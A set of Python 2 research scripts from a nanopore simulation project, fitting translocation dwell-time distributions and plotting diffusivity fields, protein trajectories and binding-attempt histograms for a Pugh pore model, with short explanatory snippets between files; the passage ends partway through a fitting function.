from numpy import exp, pi, sqrt, linspace, diff, array, dot
L = 46e-9 # length of pore
r = 2.0779e-9 # radius of protein trypsin
V = 0.08 # applied potential
E = V/L # electric field
rD = 0.2
#D = rD* kT/(6.*pi*eta*r) # diffusion constant (Stokes)
# load translocation events without binding
name = "events3_nobind_new"
fields.set_dir_mega()
data = fields.get_fields(name)
# take only events that translocated
data.pop("b1")
data.pop("b2")
data, _ = fields._subset(data, data["ood"], lambda x: x==0)
data, times = fields._sorted(data, data["t"])
print "mean"
D = array(data["Dzavg"]).mean() * 1e-9
F = -array(data["Fzavg"]).mean()
v = D/kT * F # electrophoretic velocity
print "D = ", D, "F = ", F, "v = ", v
print "at x = (0,0,0)"
D = 6.8e-12
F = 1.5e-11
v = D/kT * F # electrophoretic velocity
print "D = ", D, "F = ", F, "v = ", v
def mean(lst):
return sum(lst)/float(len(lst))
def maximum_likelihood(times, n=10):
times = 1e-3 * array(times)
T = mean(times)
Tinv = mean([1./t for t in times])
def amean(v):
return mean([1./(1. + L/(v*t)) for t in times])
def fix(v):
a = amean(v)
factor = (sqrt((a-.5)**2 + T*Tinv*a*(1-a)) - (a-.5))/(1-a)
print a
#print factor
return L/T * factor
v = L*sqrt(Tinv/T) # this initial guess is accurate to 1e-7!!
for i in range(n):
v0 = v
#print "i = %d: v = %s" % (i, v)
v = fix(v)
print "i = %d: dv = %s" % (i, abs(v-v0))
D = v**2/2.*T - v*L + L**2/2.*Tinv
return v, D
v, D = maximum_likelihood(times)
print "maximum likelihood"
print "D = ", D, "F = ", v*kT/D, "v = ", v
# simple 1D model from Talaga2009
def p(t, timescale=1.):
# timescale: 1 -> s, 1e-3 -> ms etc
t *= timescale
return exp(-(L - t*v)**2/(4.*t*D)) * (L + t*v) / (4.*t * sqrt(pi*t*D))
def pp(times, timescale=1.):
return array([p(t, timescale) for t in times])
def integrate(t, pt):
pt = array(pt)
dt = diff(t)
values = 0.5*(pt[:-1] + pt[1:])
return dot(values, dt)
def integrate_hist(hist):
n, bins, _ = hist
dt = diff(bins)
return dot(n, dt)
# scale times
scale = 1e-6 # microseconds
times = [t*1e-3/scale for t in times]
from matplotlib import pyplot as plt
t = linspace(1e-9/scale, 8e-6/scale, 500)
hist = plt.hist(times, bins=30, color="#aaaaff", linewidth=0.5,
weights=[1./500.]*len(times),
label="BD simulations")
pt = pp(t, scale) * integrate_hist(hist) * scale
plt.plot(t, pt, "-", color="g", linewidth=3, label="FPT model")
plt.legend(loc="upper right", frameon=False)
plt.xlabel(u"dwell time [µs]")
plt.ylabel(u"rel. frequency")
print "integral", integrate_hist(hist), "==", integrate(t, pt)
#plt.figure()
#plt.hist(data["Fzavg"], bins=30, color="#aaaaff", linewidth=0.5)
#
#plt.figure()
#plt.hist(data["Dzavg"], bins=30, color="#aaaaff", linewidth=0.5)
from folders import FIGDIR
savefigs("current-nobind-hist", FIGDIR + "/rw")
```
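The Talaga-type density `p(t)` above is a proper probability density in t (for v > 0); a standalone check that it integrates to one, using representative, purely illustrative parameter values:

```python
import numpy as np

L, v, D = 46e-9, 0.025, 7e-12      # pore length [m], drift velocity [m/s], diffusivity [m^2/s]
t = np.linspace(1e-9, 2e-5, 400001)
p = np.exp(-(L - t*v)**2/(4.*t*D)) * (L + t*v) / (4.*t*np.sqrt(np.pi*t*D))
print(np.trapz(p, t))              # ~1.0
```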
#### File: scripts/pughpore/plot_D_field.py
```python
from matplotlib import rcParams, rc
rcParams.update({
"font.size" : 7,
"axes.titlesize" : 7,
"font.family" : "sans-serif",
"font.sans-serif" : ["CMU Sans Serif"],
"lines.linewidth" : 1,
"lines.markersize" : 5,
})
import matplotlib.pyplot as plt
import numpy as np
import nanopores
import nanopores.geometries.pughpore as pughpore
from nanopores.models.pughpore import polygon as pughpolygon
from nanopores.models.pughpoints import plot_polygon
from nanopores.tools import fields
fields.set_dir_mega()
from nanopores.models.diffusion_interpolation import get_diffusivity
# from nanopores.tools.utilities import uCross, RectangleMesh
# from math import pi, sqrt
#
# dparams = {2: dict(diamPore=6., diamDNA=2.5, Nmax=1.2e5, dim=2, r=0.11, h=.75,
# cheapest=False, Membraneqs=-.5),
# 3: dict(diamPore=6., Nmax=1e6, dim=3, r=0.11, h=2.0, cheapest=False)}
# obtain diffusivity field and project to x-z plane
params = dict(geoname = "pughcyl", dim=2, r=0.11, h=.5, Nmax=1e5,
cheapest=False, Membraneqs=-0.2)
functions, mesh = get_diffusivity(**params)
#functions = get_pugh_diffusivity(**dparams[2])
#setup = pugh.Setup(dim=2, h=1., Nmax=1e5, x0=None, diffusivity="Dpugh2")
#setup.prerefine()
#pugh.set_D(setup)
#D3D = setup.phys.Dp[1, 1]
#print D3D([0.,0.])
D3D = functions["D"][0]
D0 = nanopores.D
def F(x, z):
if x>=0:
return D3D([x, z])/D0
else:
return D3D([-x, z])/D0
#D = uCross(u=D3D, axis=1, degree=1, dim=2)
# obtain 2D mesh where we will evaluate field
rx, ry = pughpore.params["R"], 0.5*pughpore.params["H"]
rx, ry = 15, 28
Nx, Ny = 201, 401
#mesh2D = RectangleMesh([-R,-H/2.], [R, H/2.], int(4*R), int(2*H))
Y, X = np.mgrid[-ry:ry:Ny*1j, -rx:rx:Nx*1j]
U = np.zeros((Ny,Nx))
for y in range(Ny):
for x in range(Nx):
U[y][x] = F(X[y][x], Y[y][x])
fig, ax = plt.subplots(figsize=(1.73, 1.9)) #, dpi=300)
pc = plt.pcolor(X, Y, U, cmap=plt.get_cmap("bone"), vmin=0, vmax=1)
plot_polygon(ax, pughpolygon(diamPore=6., rmem=15), linewidth=0.2)
plt.xlim(-15, 15)
plt.ylim(-25, 28)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
bbox = ax.get_position()
l, b, h = bbox.x0, bbox.y0, bbox.height
w = 0.05
cbaxes = fig.add_axes([l - w - 0.07, b, w, h])
cb = plt.colorbar(pc, cax=cbaxes, ax=ax)
cbaxes.set_ylabel("Rel. diffusivity") # (r"$D_{zz} / D_0$")
cb.set_ticks([0., 1.])
cb.set_ticklabels([0, 1])
cbaxes.yaxis.set_ticks_position('left')
cbaxes.yaxis.set_label_position('left')
cbaxes.yaxis.labelpad = -3.
import os
HOME = os.path.expanduser("~")
FIGDIR = os.path.join(HOME, "Dropbox", "Paper Howorka", "figures")
nanopores.savefigs("pugh/Dfield", FIGDIR)
plt.show()
```
#### File: scripts/pughpore/plot_diffusivity.py
```python
import numpy as np
import matplotlib.pyplot as plt
from diffusion import calculate_diffusivity2D
import nanopores.tools.fields as f
import nanopores
import folders
def zsorted(data, field):
z = [x[2] for x in data["x"]]
J = data[field]
I = sorted(range(len(z)), key=lambda k: z[k])
z1 = [z[i] for i in I]
J1 = [J[i] for i in I]
return z1, J1
def plot_D_data(data, label=None, num=None):
fig, ax = plt.subplots(figsize=(5, 4), num=num)
Z, D = zsorted(data, "D")
# plot
ax.plot(Z, D, ".-", label=label)
ax.set_xlabel("z position of molecule [nm]")
ax.set_ylabel(r"D/D0")
ax.set_title("rel. diffusivity (2D model)")
ax.legend(loc="best")
f.update()
data = f.get_fields("pugh_diff2D_backup", rMolecule=0.11)
#rMolecule=2.0779)
plot_D_data(data, "D")
#plt.show()
#exit()
# points
H = 50.
Z = np.linspace(-H, H, 96)
X = [[0.,0.,z] for z in Z]
fig_big, ax_big = plt.subplots(figsize=(10, 8), num="all")
fig_small, ax_small = plt.subplots(figsize=(6, 4), num="small")
# get data
for r in [0.152, 0.167, 0.25, 2.0779]:
#data = calculate_diffusivity2D(X, nproc=6, rMolecule=r, h=.6, Nmax=2.7e5)
#data = calculate_diffusivity2D(X, nproc=6, rMolecule=r)
data = f.get_fields("pugh_diffusivity2D", rMolecule=r, h=.6, Nmax=2.7e5)
Z, D = zsorted(data, "D")
# plot
ax = ax_big
ax.plot(Z, D, ".-", label="r=%.3f, N=270k" %r)
ax.set_xlabel("z position of molecule [nm]")
ax.set_ylabel("D/D0")
ax.set_title("rel. diffusivity (2D model)")
if r>=0.25: continue
names = {0.152: r"$\rm{K}^{+}$", 0.167: r"$\rm{Cl}^{-}$"}
Dmax = max(D)
D0 = [d/Dmax for d in D]
ax = ax_small
ax.plot(Z, D0, ".-", label=names[r])
ax.set_xlabel("z position of molecule [nm]")
ax.set_ylabel("D/D0")
ax.set_title("rel. diffusivity (2D model)")
# coarser calculation for remaining radii
for r in [0.5, 1., 1.5]:
N = 2e4
data = f.get_fields("pugh_diffusivity2D", rMolecule=r, h=4., Nmax=N)
Z, D = zsorted(data, "D")
# plot
ax = ax_big
ax.plot(Z, D, ".-", label="r=%.3f, N=20k" %r)
ax.set_xlabel("z position of molecule [nm]")
ax.set_ylabel("D/D0")
ax.set_title("rel. diffusivity (2D model)")
ax_big.legend(bbox_to_anchor=(1.05, 1.), loc="upper left", borderaxespad=0.,)
ax_small.legend(bbox_to_anchor=(1.05, 1.), loc="upper left", borderaxespad=0.,)
ax_small.legend(loc="lower right")
#nanopores.savefigs("pugh_diffusivity", folders.FIGDIR)
plt.show()
```
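`zsorted` above simply orders the field values by the z-coordinate of the evaluation points; an equivalent one-liner on plain lists:

```python
z = [3., -1., 2.]
J = [0.3, 0.1, 0.2]
z1, J1 = (list(t) for t in zip(*sorted(zip(z, J))))
print(z1, J1)   # [-1.0, 2.0, 3.0] [0.1, 0.2, 0.3]
```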
#### File: pughpore/randomwalk/create_plot_traj_without_dolfin.py
```python
from matplotlib.ticker import FormatStrFormatter
import matplotlib
#import nanopores as nano
#import nanopores.geometries.pughpore as pughpore
#from nanopores.models.pughpore import polygon
#from nanopores.models.pughpoints import plot_polygon
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
#import nanopores.tools.fields as f
#HOME = os.path.expanduser("~")
#PAPERDIR = os.path.join(HOME, "papers", "paper-howorka")
#FIGDIR = os.path.join(PAPERDIR, "figures", "")
#DATADIR = os.path.join(HOME,"Dropbox", "nanopores", "fields")
#f.set_dir(DATADIR)
###############################
# (c) 2017 <NAME>
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
default = dict(
R = 20.,
H = 70.,
l0 = 18., #22.5,
l1 = 14., #17.5,
l2 = 10., #12.5,
l3 = 6., #7.5,
l4 = 14., #17.5,
hpore = 46,
hmem = 2.2,
h2 = 46.-35., # 11.
h1 = 46.-35.-2.5, # 8.5
h4 = 10.,
hnear = 12,
rMolecule = 2.0779, # molecular radius of protein trypsin
x0 = [0., 0., 0.],
lcMolecule = 0.4, # relative to global mesh size
center_at_x0 = False,
center_z_at_x0 = False,
)
class Params(dict):
"for writing params.Qmol instead of params['Qmol']"
def __getattr__(self, key):
return self[key]
def __or__(self, other):
new = Params(self)
new.update(other)
return new
def plot_polygon(ax, polygon):
settings = dict(closed=True, facecolor="#eeeeee", linewidth=1.,
edgecolor="black")
polygon = np.array(polygon)
polygon_m = np.column_stack([-polygon[:,0], polygon[:,1]])
patch = patches.Polygon(polygon, **settings)
patchm = patches.Polygon(polygon_m, **settings)
#patch.set_zorder(10)
#patchm.set_zorder(10)
ax.add_patch(patch)
ax.add_patch(patchm)
def polygon(rmem=20., **params):
"polygon of pore + membrane for plotting"
#setup = SetupNoGeo(**params)
#params = nano.Params(pughpore.params) | setup.geop
params = Params(default, **params)
r = [0.5*params.l3, 0.5*params.l2, 0.5*params.l1, 0.5*params.l0,
0.5*params.l4, rmem]
ztop = params.hpore/2.
zbot = -ztop
z = [zbot, ztop - params.h2, ztop - params.h1, ztop, zbot + params.h4,
zbot + params.hmem]
# indices: [(0,0), (0,1), (1,1), (1,2), ..., (5,5), (5,0)]
return [(r[i / 2 % 6], z[(i+1) / 2 % 6]) for i in range(12)]
###############################
up = Params(default, k=3)
hpore=up.hpore
l0 = up.l0
l1 = up.l1
l2 = up.l2
l3 = up.l3
l4 = up.l4
hpore = up.hpore
hmem = up.hmem
h2 = up.h2
h1 = up.h1
h4 = up.h4
#fieldsname='events_onlyone_2'
#params=dict(avgbind1=2e7,avgbind2=3e4,P_bind1=8.e-2,P_bind2=0*3e-1,z0=hpore/2.+0.)
#i=15
#showtraj = True
#def save_fig_traj(params,fieldsname,i,showtraj):
def assertdir(DIR):
if not os.path.exists(DIR):
os.makedirs(DIR)
def savefigs(name="fig", DIR="/tmp/", size=None, pdf=False):
if not DIR.endswith("/"): DIR = DIR + "/"
assertdir(DIR)
if len(plt.get_fignums()) == 1:
fig = plt.figure(plt.get_fignums()[0])
if size is not None:
fig.set_size_inches(size)
if not pdf: suffix='.eps'
else: suffix='.pdf'
fig.savefig(DIR + name + suffix, bbox_inches="tight")
return
for num in plt.get_fignums():
fig = plt.figure(num)
label = fig.get_label()
label = str(num) if label=="" else label
if size is not None:
fig.set_size_inches(size)
if not pdf: suffix='.eps'
else: suffix='.pdf'
fig.savefig(DIR + name + "_" + label + suffix, bbox_inches="tight")
def save_fig_traj():
showtraj = False
# data=f.get_fields(fieldsname,**params)
b1 = [[[l3/2.,-hpore/2.],[l3/2.,hpore/2.-h2],[l2/2.,hpore/2.-h2],[l2/2.,hpore/2.-h1],[l1/2.,hpore/2.-h1],[l1/2.,hpore/2.]]]
# b2 = [[[l3/2.-.5,11.],[l3/2.-.5,-3.]]]
# b2 = [[[l3/2.,-11.],[l3/2.,3.]]]
# b1 =data["b1"]
# b2 =data["b2"]
if showtraj:
X = data["X"][0]
Y = data["Y"][0]
Z = data["Z"][0]
T = data["T"][0]
J = data["J"][0]
J=J.load()
T=T.load()
curr = 7.523849e-10
bind1 = np.where(T>1e6)[0]
bind2 = np.intersect1d(np.where(T<=1e6)[0],np.where(T>100.)[0])
amplitude = curr-np.inner(J,T)/np.sum(T)
for k in range(1,T.shape[0]):
T[k]=T[k]+T[k-1]
tau_off=T[-1]
J=J*1e12
figname = fieldsname+'_traj_'+'%.8f'%(tau_off*1e-6)+'_%04d'%i+'_%.1e_%.1e_%.1e_%.1e'%(params["avgbind1"],params["avgbind2"],params["P_bind1"],params["P_bind2"])+str(params["z0"])
else:
# figname = fieldsname+'_bindzones'+'_%.1e_%.1e_%.1e_%.1e'%(params["avgbind1"],params["avgbind2"],params["P_bind1"],params["P_bind2"])+str(params["z0"])
figname = 'bindzones_both.eps'
if showtraj:
fig=plt.figure(figsize=(8,5),dpi=80)
else:
fig=plt.figure(figsize=(3,5),dpi=80)
color2='#ff0000'
color1='#ff9900'
color3='#00ff00'
#b1 = [[[l1/2.,17.],[l1/2.,19.]],[[l3/2.,-hpore/2.],[l3/2.,hpore/2.-h2],[l2/2.,hpore/2.-h2],[l2/2.,14.]]]
for seq in b1:
x= [p[0] for p in seq]
xm=[-p[0] for p in seq]
y= [p[1] for p in seq]
plt.plot(x,y,color=color1,linewidth=2.)
plt.plot(xm,y,color=color1,linewidth=2.)
b2 = [[[l3/2.-.5,-4.],[l3/2.-.5,4.]]]
for seq in b2:
x= [p[0] for p in seq]
xm=[-p[0] for p in seq]
y= [p[1] for p in seq]
plt.plot(x,y,color=color2,linewidth=2.)
plt.plot(xm,y,color=color2,linewidth=2.)
if showtraj:
plt.plot(X,Z,linewidth=1.,c='#0000ff')
longer = plt.scatter(X[bind1],Z[bind1],s=200,marker='h',c=color2,linewidth=0.)
shorter = plt.scatter(X[bind2],Z[bind2],s=100,marker='h',c=color1,linewidth=0.)
start = plt.scatter([X[0]],[Z[0]],s=200,marker='x',c=color3,linewidth=2.)
patches=[start]
labels=['Start']
if showtraj and len(bind1)>0:
patches=patches+[longer]
labels+=['Longer bindings']
if showtraj and len(bind2)>0:
patches=patches+[shorter]
labels+=['Shorter bindings']
if showtraj:
plt.legend(patches,labels,scatterpoints=1,loc=(.42,.15))
ax=plt.gca()
ax.set_aspect('equal')
if showtraj:
ax.set_xlim([20.,-55.])
ax.set_ylim([-25.,40.])
else:
ax.set_xlim([20.,-20.])
ax.set_ylim([-25.,40.])
ax.set_xticks([])
ax.set_yticks([])
plt.axis('off')
plot_polygon(ax,polygon(rmem=60.))
if showtraj:
plt.axes([.55,.5,.2,.3])
plt.title('Current signal')
ax=plt.gca()
if tau_off<1e3:
t = np.linspace(0.,tau_off,3)
fac=1.
ax.set_xlabel('time [$ns$]')
elif tau_off<1e6 and tau_off>=1e3:
t = np.linspace(0.,tau_off*1e-3,3)
fac = 1e-3
ax.set_xlabel(r'time [$\mu s$]')
else:
t = np.linspace(0.,tau_off*1e-6,3)
fac = 1e-6
ax.set_xlabel('time [$ms$]')
T=T*fac
plt.plot(T,J,color='#000000')
yt = np.linspace(580.,760,4)
ax.set_ylabel(r'A [$pA$]')
ax.set_yticks(yt)
ax.set_xticks(t)
xfmt=FormatStrFormatter('%.1f')
ax.xaxis.set_major_formatter(xfmt)
ax.set_xlim([-4e-2*tau_off*fac,(1.+4e-2)*tau_off*fac])
plt.tight_layout()
#savefigs(name=figname,DIR='/home/bstadlbau/plots/')
plt.show()
# print 'savefig: %s'%figname
# plt.close("all")
save_fig_traj()
```
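The integer arithmetic in `polygon()` above walks the corner list in exactly the pattern noted in its comment; printed explicitly (with `//` making the Python 2 integer division explicit):

```python
pairs = [(i // 2 % 6, (i + 1) // 2 % 6) for i in range(12)]
print(pairs)
# [(0, 0), (0, 1), (1, 1), (1, 2), (2, 2), (2, 3), (3, 3), (3, 4), (4, 4), (4, 5), (5, 5), (5, 0)]
```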
#### File: pughpore/randomwalk/get_D_old.py
```python
import matplotlib
matplotlib.use("Agg")
from matplotlib import pyplot as plt
import numpy as np
import os
from nanopores.tools import fields
from scipy.interpolate import interp1d
HOME = os.path.expanduser("~")
DATADIR = os.path.join(HOME, "Dropbox", "nanopores", "fields")
fields.set_dir(DATADIR)
data = fields.get_fields("pugh_diff3D_cross", bulkbc=True, rMolecule=2.0779)
def smooth3(l):
A=np.array(l)
B=A[:]
ker=np.array([1./3,1./3,1./3])
n=int(ker.shape[0]/2.)
for i in range(n,A.shape[0]-n):
B[i]=np.inner(A[i-n:i+n+1],ker)
return list(B)
def smooth5(l):
A=np.array(l)
B=A[:]
ker=np.array([.2,.2,.2,.2,.2])
n=int(ker.shape[0]/2.)
for i in range(n,A.shape[0]-n):
B[i]=np.inner(A[i-n:i+n+1],ker)
return list(B)
def smootha(l):
A=np.array(l)
B=A[:]
ker=np.array([10.,12.,15.,12.,10.])
ker=ker/np.sum(ker)
n=int(ker.shape[0]/2.)
for i in range(n,A.shape[0]-n):
B[i]=np.inner(A[i-n:i+n+1],ker)
return list(B)
x = [z[0] for z in data["x"]]
data, x = fields._sorted(data, x)
eps=5e-3
x_=x[:]
#x_.extend([1.,1.+eps,1.+2*eps,1.+3*eps])
x.extend([(x[-1]+1.)/2.,1.,1.+eps,1.+2*eps,1.+3*eps,1.+4*eps,1.+5*eps])
dstr = ["x", "y", "z"]
Dxx = [D[0][0] for D in data["D"]]
Dyy = [D[1][1] for D in data["D"]]
Dzz = [D[2][2] for D in data["D"]]
Dxx_ = [D[0][0] for D in data["D"]]
Dyy_ = [D[1][1] for D in data["D"]]
Dzz_ = [D[2][2] for D in data["D"]]
Dxx.extend([0.,0.,0.,0.,0.,0.,0.])
Dyy.extend([Dyy[-1]/2.,0.,0.,0.,0.,0.,0.])
Dzz.extend([Dzz[-1]/2.,0.,0.,0.,0.,0.,0.])
#Dxx_.extend([0.,0.,0.,0.])
#Dyy_.extend([0.,0.,0.,0.])
#Dzz_.extend([0.,0.,0.,0.])
Dxx=smooth5(smooth3(Dxx))
Dyy=smooth5(smooth3(Dyy))
Dzz=smooth5(smooth3(Dzz))
Dx = interp1d(x,Dxx)
Dy = interp1d(x,Dyy)
Dz = interp1d(x,Dzz)
DDxx = [0.]+[(Dxx[i+1]-Dxx[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
DDyy = [0.]+[(Dyy[i+1]-Dyy[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
DDzz = [0.]+[(Dzz[i+1]-Dzz[i-1])/(x[i+1]-x[i-1]) for i in range(1,len(x)-1)]+[0.]
dDx = interp1d(x,DDxx)
dDy = interp1d(x,DDyy)
dDz = interp1d(x,DDzz)
if __name__=='__main__':
xc=np.linspace(0.,1.,100)
plt.plot(x_,Dxx_,color='blue',linestyle=':')
plt.scatter(x_,Dxx_,color='blue')
plt.scatter(x,Dxx,color='blue')
#plt.plot(x,Dxx,color='blue')
plt.plot(xc,Dx(xc),color='blue',label=r"$D_{%s%s}$" % (dstr[0], dstr[0]))
plt.scatter(x,DDxx,color='blue')
#plt.plot(x,DDxx,color='blue')
plt.plot(xc,dDx(xc),color='blue')
plt.plot(x_,Dyy_,color='red',linestyle=':')
plt.scatter(x_,Dyy_,color='red')
plt.scatter(x,Dyy,color='red')
#plt.plot(x,Dyy,color='red')
plt.plot(xc,Dy(xc),color='red',label=r"$D_{%s%s}$" % (dstr[1], dstr[1]))
plt.scatter(x,DDyy,color='red')
#plt.plot(x,DDyy,color='red')
plt.plot(xc,dDy(xc),color='red')
plt.plot(x_,Dzz_,color='green',linestyle=':')
plt.scatter(x_,Dzz_,color='green')
plt.scatter(x,Dzz,color='green')
#plt.plot(x,Dzz,color='green')
plt.plot(xc,Dz(xc),color='green',label=r"$D_{%s%s}$" % (dstr[2], dstr[2]))
plt.scatter(x,DDzz,color='green')
#plt.plot(x,DDzz,color='green')
plt.plot(xc,dDz(xc),color='green')
plt.xlabel('distance from pore center [nm]')
plt.ylabel('diffusivity relative to bulk')
plt.legend(loc='lower left')
plt.tight_layout()
plt.savefig('get_new.png')
```
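Note that `B = A[:]` on a numpy array is a view, so the loops in `smooth3`/`smooth5` above reuse already-smoothed values on the left side of each window. For comparison, a sketch of a plain (non-recursive) centered 3-point moving average:

```python
import numpy as np

def smooth3_plain(l):
    A = np.array(l, dtype=float)
    B = A.copy()                                      # a real copy, not a view
    B[1:-1] = np.convolve(A, np.ones(3)/3., mode="valid")
    return list(B)

print(smooth3_plain([0., 0., 3., 0., 0.]))            # [0.0, 1.0, 1.0, 1.0, 0.0]
```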
#### File: pughpore/randomwalk/noc.py
```python
from math import exp, factorial, pow
import matplotlib
matplotlib.use("Agg")
from matplotlib import gridspec
import matplotlib.pyplot as plt
import numpy as np
import os
import nanopores.tools.fields as f
HOME = os.path.expanduser("~")
PAPERDIR = os.path.join(HOME, "papers", "paper-howorka")
FIGDIR = os.path.join(PAPERDIR, "figures", "")
DATADIR = os.path.join(HOME,"Dropbox", "nanopores", "fields")
f.set_dir(DATADIR)
hpore=46.
#fieldsname='number_of_collisions_all'
fieldsname='number_of_collisions'
params=dict(avgbind1=2e7,avgbind2=3e4,P_bind1=0.,P_bind2=0.,z0=23.) # old one interval lengths(4,8,13)
#params=dict(avgbind1=23e6,avgbind2=3e4,P_bind1=0*0.035,P_bind2=0*3e-1,z0=hpore/2.+0.) # for binding everywhere
data=f.get_fields(fieldsname,**params)
data2=f.get_fields(fieldsname+'2',**params)
data3=f.get_fields(fieldsname+'3',**params)
Nc=np.array(data["Nc"])
Nc2=np.array(data2["Nc"])
Nc3=np.array(data3["Nc"])
lam=np.mean(Nc)
lam2=np.mean(Nc2)
lam3=np.mean(Nc3)
k=np.arange(0,21)
def P(k):
return pow(lam,k)/(factorial(k))*exp(-lam)
P=np.array([P(x) for x in k])
def P2(k):
return pow(lam2,k)/(factorial(k))*exp(-lam2)
P2=np.array([P2(x) for x in k])
def P3(k):
return pow(lam3,k)/(factorial(k))*exp(-lam3)
P3=np.array([P3(x) for x in k])
color1 = 'blue'
color2 = 'green'
color3 = 'red'
alpha=.25
s=30.
plt.figure(figsize=(5,4),dpi=80)
#gs = gridspec.GridSpec(1,2,width_ratios=[1,1])
#gs.update(wspace=0.,hspace=0.)
#plt1=plt.subplot(gs[0])
plt.hist(Nc,bins=19,normed=1,alpha=alpha,color=color1,histtype='bar',align='left')
len3 = plt.scatter(k,P,color=color1,s=s)
plt.hist(Nc2,13,normed=1,alpha=alpha,color=color2,histtype='bar',align='left')
len2 = plt.scatter(k,P2,color=color2,s=s)
plt.hist(Nc3,8,normed=1,alpha=alpha,color=color3,histtype='bar',align='left')
len1 = plt.scatter(k,P3,color=color3,s=s)
ax=plt.gca()
xlim=[-.5,16.]
ylim=[0.,.40]
xticks=np.arange(0.,17.,2.)
yticks=np.arange(0.,.5,.1)
ax.set_xlim(xlim)
ax.set_ylim(ylim)
ax.set_xticks(xticks)
ax.set_yticks(yticks)
ax.legend([len1,len2,len3],['length 3nm','length 8nm','length 14nm'],frameon=False)
ax.set_xlabel('binding attempts')
ax.set_ylabel('relative frequency/probability')
#plt2=plt.subplot(gs[1])
#plt2.plot([3.,8.,14.],[lam3,lam2,lam])
#plt2.scatter([14.],[lam], color=color1,s=100,marker='s')
#plt2.scatter([8.0],[lam2],color=color2,s=100,marker='s')
#plt2.scatter([3.0],[lam3],color=color3,s=100,marker='s')
#plt2.set_xlabel('length of binding site [nm]')
#plt2.set_ylabel('mean binding attempts')
plt.tight_layout()
plt.savefig('attempts.pdf')
#plt.show()
```
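The hand-rolled `P(k)` above is the Poisson pmf with mean lambda; it agrees with scipy's implementation, which could be used directly:

```python
import numpy as np
from math import exp, factorial
from scipy.stats import poisson

lam = 4.1                                        # hypothetical mean number of binding attempts
k = np.arange(0, 21)
P_hand = np.array([lam**x/factorial(x)*exp(-lam) for x in range(21)])
print(np.allclose(P_hand, poisson.pmf(k, lam)))  # True
```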
#### File: scripts/pughpore/rw.py
```python
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import tangent
import dolfin
import nanopores
import nanopores.models.randomwalk as randomwalk
from nanopores.tools.polygons import Rectangle
from nanopores.tools import fields, statistics
fields.set_dir_mega()
params = nanopores.user_params(
# general params
# geo
geoname = "pughcyl",
dim = 2,
diamPore = 6.,
rMolecule = 2.0779,
R = 40.,
Htop = 60.,
Hbot = 35.,
geop = dict(R=40., Htop=60., Hbot=35.),
x0 = None,
# physics
Qmol = 5.,
bulkcon = 1000.,
dnaqsdamp = 0.7353,
bV = -0.1,
posDTarget = True,
# solver
h = 2.,
frac = 0.5,
Nmax = 5e4,
imax = 30,
tol = 1e-3,
cheapest = False,
stokesiter = False, #True
hybrid = True,
reconstruct = False,
# random walk params
N = 100, # number of (simultaneous) random walks
dt = .2, # time step [ns]
walldist = 1., # in multiples of radius, should be >= 1
margtop = 15., # 35 is about the maximum
margbot = 0.,
rstart = 5.,
initial = "sphere",
# receptor params
bind_everywhere = False,
lbind = 8., # length of binding zone for long binding [nm]
ra = .2, # binding zone radius [nm] (1nm means whole channel)
collect_stats_mode = True,
)
########### WHAT TO DO ###########
todo = nanopores.user_params(
test_solver = False,
plot_dolfin = False,
plot_streamlines = False,
video = True,
plot_distribution = False,
fit_experiments = False,
fit_gamma = False,
fit_long = False,
fit_long_gamma = False,
)
########### SETUP ###########
NAME = "rw_pugh_0"
def binding_(params):
# TODO: make other params dependent on additional **args
return dict(
binding = True,
bind_type = "zone",
collect_stats_mode = params["collect_stats_mode"],
t = 1e9, # mean of exponentially distributed binding duration [ns]
ka = 1e9, # (bulk) association rate constant [1/Ms]
ra = params["ra"], # radius of the association zone [nm]
use_force = True, # if True, t_mean = t*exp(-|F|*dx/kT)
dx = 0.1, # width of bond energy barrier [nm]
)
def setup_rw(params, **_):
pore = nanopores.get_pore(**params)
rw = randomwalk.RandomWalk(pore, **params)
binding_params = binding_(params)
if params["bind_everywhere"]:
rw.add_wall_binding(**binding_params)
else:
r = pore.params.l3/2.
z = -pore.params.hpore/2. + pore.params.h4
wbind = 1.
lbind = params["lbind"]
bindsite = Rectangle((r, r + wbind), (z, z + lbind))
rw.add_domain(bindsite, exclusion=False, **binding_params)
#rw.domains[0].__dict__.update(exclusion=True, binding=True,
# bind_type="collision", eps=0., p=1., walldist=1.)
return rw
########### TEST AND PLOT SOLVER ###########
if todo.test_solver:
import nanopores.models.nanopore as nanopore
setup = nanopore.Setup(**params)
_, pnps = nanopore.solve(setup, True)
dolfin.interactive()
if todo.plot_dolfin:
rw = setup_rw(params)
dolfin.plot(rw.D[1])
dolfin.plot(rw.F)
dolfin.interactive()
if todo.plot_streamlines:
rw = setup_rw(params)
rw.plot_streamlines(both=True, R=20, Hbot=30, Htop=35,
maxvalue=1e-10, figsize=(5, 5))
plt.figure("D")
dolfin.plot(rw.D[1], backend="matplotlib")
#plt.show()
if todo.video:
rw = setup_rw(params)
randomwalk.run(rw)
########### PLOT ATTEMPT TIME DISTRIBUTION ###########
def NLS(ti, yi, t0=0., tol=1e-14):
"nonlinear least squares to fit exponential distribution with mean exp(x)"
xi = np.log(ti)
def f(x, xi, yi):
return np.sum((1. - np.exp(-np.exp(xi - x)) - yi)**2)
# minimize f by solving df(x) = 0 with newton method
df = tangent.grad(f)
ddf = tangent.grad(df)
x = np.log(t0)
while np.abs(df(x, xi, yi)) > tol:
x -= df(x, xi, yi)/ddf(x, xi, yi)
#print "|f(x)|", np.abs(df(x, xi, yi))
return np.exp(x)
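# Usage sketch for NLS (illustrative only, not part of the original workflow):
# recover the mean of synthetic exponentially distributed samples from their
# empirical cdf, e.g.
# ti = np.sort(np.random.exponential(5., 10000))
# yi = np.arange(len(ti))/float(len(ti))
# print NLS(ti, yi, t0=1.) # should print a value close to 5.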
def NLS2(ti, yi, t10=1., t20=100., w0=0.5, tol=1e-14):
"nonlinear least squares to fit DOUBLE exponential distribution"
xi = np.log(ti)
# find: characteristic times exp(x1), exp(x2) and weights w1, w2
def f(theta, xi, yi):
w = theta[0]
x1, x2 = theta[1], theta[2]
z = w*np.exp(-np.exp(xi - x1)) + (1.-w)*np.exp(-np.exp(xi - x2))
return np.sum((1. - z - yi)**2)
# minimize f by solving df(x) = 0 with newton method
df = tangent.grad(f)
ddf = tangent.grad(df, mode="forward")
def Jf(theta, xi, yi):
